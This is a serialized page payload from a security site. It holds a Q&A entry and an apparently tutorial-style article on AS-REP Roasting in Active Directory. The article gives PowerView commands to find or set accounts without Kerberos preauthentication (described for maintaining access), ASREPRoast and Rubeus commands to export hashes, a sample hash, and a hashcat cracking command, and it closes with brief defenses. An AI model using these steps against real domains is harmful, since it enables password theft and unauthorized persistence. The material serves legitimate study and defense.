[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDpizoQ9Y4ElyOHmwNsrnsJe9lKmtEnX6m9QEU3Y5Ahg":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},646,"What conditions must be met for AS-REPRoasting to succeed?","The target domain user must have the 'Do not require Kerberos preauthentication' attribute enabled in Active Directory. This option is not enabled by default, so an attacker often needs prior permissions—such as GenericWrite—to set it via PowerView before exploiting the vulnerability. Once enabled, the attacker can request an AS-REP and extract the hash.","\u003Cp>The target domain user must have the &#39;Do not require Kerberos preauthentication&#39; attribute enabled in Active Directory. This option is not enabled by default, so an attacker often needs prior permissions—such as GenericWrite—to set it via PowerView before exploiting the vulnerability. Once enabled, the attacker can request an AS-REP and extract the hash.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-as-reproasting\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-conditions-must-be-met-for-as-reproasting-to-succeed-1777482628337","AS-REPRoasting, Kerberos preauthentication, PowerView, GenericWrite",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},160,"Domain Penetration - AS-REPRoasting","domain-penetration-as-reproasting","Learn AS-REP Roasting: exploit users without Kerberos preauthentication to extract password hashes, crack with hashcat, and defend your domain.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Similar to Kerberoasting, AS-REP Roasting can obtain the hash of a user's password if certain conditions are met. By combining it with hashcat for cracking, the user's plaintext password can ultimately be recovered.\u003C\u002Fp>\u003Cp>This article will reference publicly available materials and combine personal understanding to introduce the exploitation methods of AS-REP Roasting, concluding with defensive recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>The principle of AS-REP Roasting\u003C\u002Fli>\u003Cli>The conditions for exploiting AS-REP Roasting\u003C\u002Fli>\u003Cli>The exploitation methods of AS-REP Roasting\u003C\u002Fli>\u003Cli>Methods for cracking hashes\u003C\u002Fli>\u003Cli>Defensive recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 AS-REP Roasting\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Introduction\u003C\u002Fh3>\u003Cp>For domain users with the \"Do not require Kerberos preauthentication\" option enabled, sending an AS-REQ request to port 88 of the domain controller and reassembling the received AS-REP content can construct a \"Kerberos 5 AS-REP etype 23\" (18200) format. This can then be cracked using hashcat to ultimately obtain the user's plaintext password.\u003C\u002Fp>\u003Ch3>2. Prerequisites for Exploitation\u003C\u002Fh3>\u003Cp>The domain user has the \"Do not require Kerberos preauthentication\" option enabled.\u003C\u002Fp>\u003Cp>Typically, this option is not enabled by default.\u003C\u002Fp>\u003Ch3>3. Exploitation Approach\u003C\u002Fh3>\u003Cp>Commonly used in domain penetration for maintaining access.\u003C\u002Fp>\u003Cp>First, obtain GenericWrite permissions for the target user. The exploitation steps are as follows:\u003C\u002Fp>\u003Col>\u003Cli>Enable the user option \"Do not require Kerberos preauthentication\".\u003C\u002Fli>\u003Cli>Export the hash and crack it.\u003C\u002Fli>\u003Cli>Disable the user option \"Do not require Kerberos preauthentication\".\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x03 AS-REP Roasting Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Identifying Eligible Users\u003C\u002Fh3>\u003Cp>The user must have the \"Do not require Kerberos preauthentication\" option enabled.\u003C\u002Fp>\u003Cp>LDAP can be used here to query users that meet the condition (userAccountControl:1.2.840.113556.1.4.803:=4194304)\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F305144\u002Fhow-to-use-useraccountcontrol-to-manipulate-user-account-properties\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002F445f7b2510c4553dcd9451bc4daccb20c8e67cbb\u002FRecon\u002FPowerView.ps1#L4769\u003C\u002Fp>\u003Cp>The value corresponding to the DONT_REQ_PREAUTH item is 4194304\u003C\u002Fp>\u003Cp>The PowerView command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017299345_0_0bbc77fbf0.jpeg\">\u003C\u002Fp>\u003Cp>Display only the distinguishedname item:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017325552_1_2b8459fdc0.jpeg\">\u003C\u002Fp>\u003Ch3>2. Enable and disable the option \"Do not require Kerberos preauthentication\"\u003C\u002Fh3>\u003Cp>Enabling the option means adding the attribute to the user (userAccountControl=4194304)\u003C\u002Fp>\u003Cp>The command to enable the option is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Set-DomainObject -Identity testb -XOR @{userAccountControl=4194304} -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Disabling the option means removing the user attribute (userAccountControl=4194304)\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Here, XOR operation can be performed again; two XOR operations are equivalent to not changing the original value, i.e., removing the user attribute (userAccountControl)\u003C\u002Fp>\u003Cp>The command to disable the option is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Set-DomainObject -Identity testb -XOR @{userAccountControl=4194304} -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Export hash\u003C\u002Fh3>\u003Ch4>(1) Using Powershell\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgithub.com\u002FHarmJ0y\u002FASREPRoast\u003C\u002Fp>\u003Cp>The command to export all available user hashes is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\ASREPRoast.ps1\u003Cbr>Invoke-ASREPRoast -Verbose |fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017376958_2_3246e95daf.jpeg\">\u003C\u002Fp>\u003Cp>The command to export the hash of a specified user is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-ASREPHash -UserName testb -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017396877_3_e7c799a4da.jpeg\">\u003C\u002Fp>\u003Cp>Extract the hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$krb5asrep$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Using C# (Rubeus)\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgithub.com\u002FGhostPack\u002FRubeus\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Rubeus.exe asreproast\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017442637_4_19ed1a6809.jpeg\">\u003C\u002Fp>\u003Ch3>4. Cracking with hashcat\u003C\u002Fh3>\u003Cp>Extract the hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$krb5asrep$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To format it for hashcat recognition, add $23 after $krb5asrep\u003C\u002Fp>\u003Cp>The parameters for hashcat dictionary attack are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>hashcat -m 18200 '$krb5asrep$23$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3' \u002Fusr\u002Fshare\u002Fjohn\u002Fpassword.lst -o found.txt --force\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter explanation:\u003C\u002Fp>\u003Cp>\u002Fusr\u002Fshare\u002Fjohn\u002Fpassword.lst is the location of the dictionary file\u003C\u002Fp>\u003Cp>-o found.txt indicates the output location\u003C\u002Fp>\u003Ch2>0x04 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Ensure there are no users with \"Do not require Kerberos preauthentication\" enabled in the domain\u003C\u002Fp>\u003Cp>Scanning method (using PowerView):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Enforce complex passwords for domain users to increase difficulty for dictionary and brute-force attacks\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation conditions and methods of AS-REP Roasting in domain penetration, providing defense recommendations\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Similar to Kerberoasting, AS-REP Roasting can obtain the hash of a user's password if certain conditions are met. By combining it with hashcat for cracking, the user's plaintext password can ultimately be recovered.\u003C\u002Fp>\u003Cp>This article will reference publicly available materials and combine personal understanding to introduce the exploitation methods of AS-REP Roasting, concluding with defensive recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>The principle of AS-REP Roasting\u003C\u002Fli>\u003Cli>The conditions for exploiting AS-REP Roasting\u003C\u002Fli>\u003Cli>The exploitation methods of AS-REP Roasting\u003C\u002Fli>\u003Cli>Methods for cracking hashes\u003C\u002Fli>\u003Cli>Defensive recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 AS-REP Roasting\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Introduction\u003C\u002Fh3>\u003Cp>For domain users with the \"Do not require Kerberos preauthentication\" option enabled, sending an AS-REQ request to port 88 of the domain controller and reassembling the received AS-REP content can construct a \"Kerberos 5 AS-REP etype 23\" (18200) format. This can then be cracked using hashcat to ultimately obtain the user's plaintext password.\u003C\u002Fp>\u003Ch3>2. Prerequisites for Exploitation\u003C\u002Fh3>\u003Cp>The domain user has the \"Do not require Kerberos preauthentication\" option enabled.\u003C\u002Fp>\u003Cp>Typically, this option is not enabled by default.\u003C\u002Fp>\u003Ch3>3. Exploitation Approach\u003C\u002Fh3>\u003Cp>Commonly used in domain penetration for maintaining access.\u003C\u002Fp>\u003Cp>First, obtain GenericWrite permissions for the target user. The exploitation steps are as follows:\u003C\u002Fp>\u003Col>\u003Cli>Enable the user option \"Do not require Kerberos preauthentication\".\u003C\u002Fli>\u003Cli>Export the hash and crack it.\u003C\u002Fli>\u003Cli>Disable the user option \"Do not require Kerberos preauthentication\".\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x03 AS-REP Roasting Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Identifying Eligible Users\u003C\u002Fh3>\u003Cp>The user must have the \"Do not require Kerberos preauthentication\" option enabled.\u003C\u002Fp>\u003Cp>LDAP can be used here to query users that meet the condition (userAccountControl:1.2.840.113556.1.4.803:=4194304)\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F305144\u002Fhow-to-use-useraccountcontrol-to-manipulate-user-account-properties\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002F445f7b2510c4553dcd9451bc4daccb20c8e67cbb\u002FRecon\u002FPowerView.ps1#L4769\u003C\u002Fp>\u003Cp>The value corresponding to the DONT_REQ_PREAUTH item is 4194304\u003C\u002Fp>\u003Cp>The PowerView command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017299345_0_0bbc77fbf0-1.jpeg\">\u003C\u002Fp>\u003Cp>Display only the distinguishedname item:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017325552_1_2b8459fdc0-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Enable and disable the option \"Do not require Kerberos preauthentication\"\u003C\u002Fh3>\u003Cp>Enabling the option means adding the attribute to the user (userAccountControl=4194304)\u003C\u002Fp>\u003Cp>The command to enable the option is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Set-DomainObject -Identity testb -XOR @{userAccountControl=4194304} -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Disabling the option means removing the user attribute (userAccountControl=4194304)\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Here, XOR operation can be performed again; two XOR operations are equivalent to not changing the original value, i.e., removing the user attribute (userAccountControl)\u003C\u002Fp>\u003Cp>The command to disable the option is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Set-DomainObject -Identity testb -XOR @{userAccountControl=4194304} -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Export hash\u003C\u002Fh3>\u003Ch4>(1) Using Powershell\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgithub.com\u002FHarmJ0y\u002FASREPRoast\u003C\u002Fp>\u003Cp>The command to export all available user hashes is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\ASREPRoast.ps1\u003Cbr>Invoke-ASREPRoast -Verbose |fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017376958_2_3246e95daf-1.jpeg\">\u003C\u002Fp>\u003Cp>The command to export the hash of a specified user is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-ASREPHash -UserName testb -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017396877_3_e7c799a4da-1.jpeg\">\u003C\u002Fp>\u003Cp>Extract the hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$krb5asrep$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Using C# (Rubeus)\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgithub.com\u002FGhostPack\u002FRubeus\u003C\u002Fp>\u003Cp>Command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Rubeus.exe asreproast\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017442637_4_19ed1a6809-1.jpeg\">\u003C\u002Fp>\u003Ch3>4. Cracking with hashcat\u003C\u002Fh3>\u003Cp>Extract the hash:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$krb5asrep$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To format it for hashcat recognition, add $23 after $krb5asrep\u003C\u002Fp>\u003Cp>The parameters for hashcat dictionary attack are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>hashcat -m 18200 '$krb5asrep$23$testb@test.com:a128092441a3af80015554db2f3fe44e$d69b44c7d9cf36261a012d012f636a2124837af89a48ef686e1ac7572af93741fc801423443a85c9aacd6a5f85f1d840d07b09e68795ce691a818fa765674c3f25492ed49e7274d98096d599c9ff0de6e169efdb3429cde39dbdea4633580981bcb34ecf330d0cb2cb194e2944f77b8fc15c056684fee33d3ee7e0b86bc56072c3bfcd2d3abeb06bfb42144a06cf90c5c60e9c255d93d9c62bbf1cc37e75d8f6d22120bf8de673db20f108da96a9e3d9d099346fff8619f49961feeaf96c35eb1a237b42b6716012dfc08d96146eb1df65e9a66a67685c04f8ab7e21bfa36800babc1ad3' \u002Fusr\u002Fshare\u002Fjohn\u002Fpassword.lst -o found.txt --force\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter explanation:\u003C\u002Fp>\u003Cp>\u002Fusr\u002Fshare\u002Fjohn\u002Fpassword.lst is the location of the dictionary file\u003C\u002Fp>\u003Cp>-o found.txt indicates the output location\u003C\u002Fp>\u003Ch2>0x04 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Ensure there are no users with \"Do not require Kerberos preauthentication\" enabled in the domain\u003C\u002Fp>\u003Cp>Scanning method (using PowerView):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\\PowerView.ps1\u003Cbr>Get-DomainUser -PreauthNotRequired -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Enforce complex passwords for domain users to increase difficulty for dictionary and brute-force attacks\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation conditions and methods of AS-REP Roasting in domain penetration, providing defense recommendations\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",853,"Onedaysec",3,"published","2026-02-02T07:38:21.454Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"AS-REP Roasting Attack Guide: Exploit & Defense in Domain Penetration","AS-REP Roasting, domain penetration, Kerberos attack, hash cracking, preauthentication, PowerShell exploitation, Active Directory security, hashcat, userAccountControl, defensive recommendations",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4,47],649,648,647,645,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.131Z","2026-07-23T16:01:53.874Z","draft","2026-07-23T16:13:57.494Z"]